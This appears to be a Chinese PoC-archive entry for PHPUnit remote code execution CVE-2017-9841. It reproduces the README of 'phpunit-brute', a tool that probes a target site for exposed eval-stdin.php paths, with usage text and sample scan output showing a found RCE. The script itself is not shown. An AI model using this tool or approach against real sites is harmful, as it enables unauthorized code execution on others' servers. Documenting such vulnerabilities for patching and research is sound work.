关联漏洞
标题:
PHPUnit 安全漏洞
(CVE-2017-9841)
描述:TYPO3是瑞士TYPO3协会维护的一套免费开源的内容管理系统。PHPUnit是其中的一个基于PHP的测试框架。 PHPUnit 4.8.28之前的版本和5.6.3之前的5.x版本中的Util/PHP/eval-stdin.php文件存在安全漏洞。远程攻击者可通过发送以‘<?php’字符串开头的HTTP POST数据利用该漏洞执行任意PHP代码。
描述
Tool to try multiple paths for PHPunit RCE CVE-2017-9841
介绍
# phpunit-brute
Tool to try multiple paths for PHPunit RCE (CVE-2017-9841) and it will log found paths to found.txt in the dir.
It uses the following list of paths `https://raw.githubusercontent.com/random-robbie/bruteforce-lists/master/phpunit.txt`
if you have a path that is not on there please submit a PR
```
usage: phpunit-brute.py [-h] -u URL [-p PROXY]
phpunit-brute.py: error: the following arguments are required: -u/--url
```
Example
---
```
python3 phpunit-brute.py -u http://someoldwebsite.com
[-] No Luck for /_inc/vendor/stripe/stripe-php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /_staff/cron/php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /_staff/php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /~champiot/Laravel E2N test/tuto_laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /~champiot/Laravel%20E2N%20test/tuto_laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /~champiot/tuto_laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /172410101040/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /1board/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /20170811125232/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[+] Found RCE for http://someoldwebsite.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [+]
```
文件快照
[4.0K] /data/pocs/a01add6962ba9760208d382ffa51c0d04b8a180f
├── [2.6K] phpunit-brute.py
└── [1.4K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。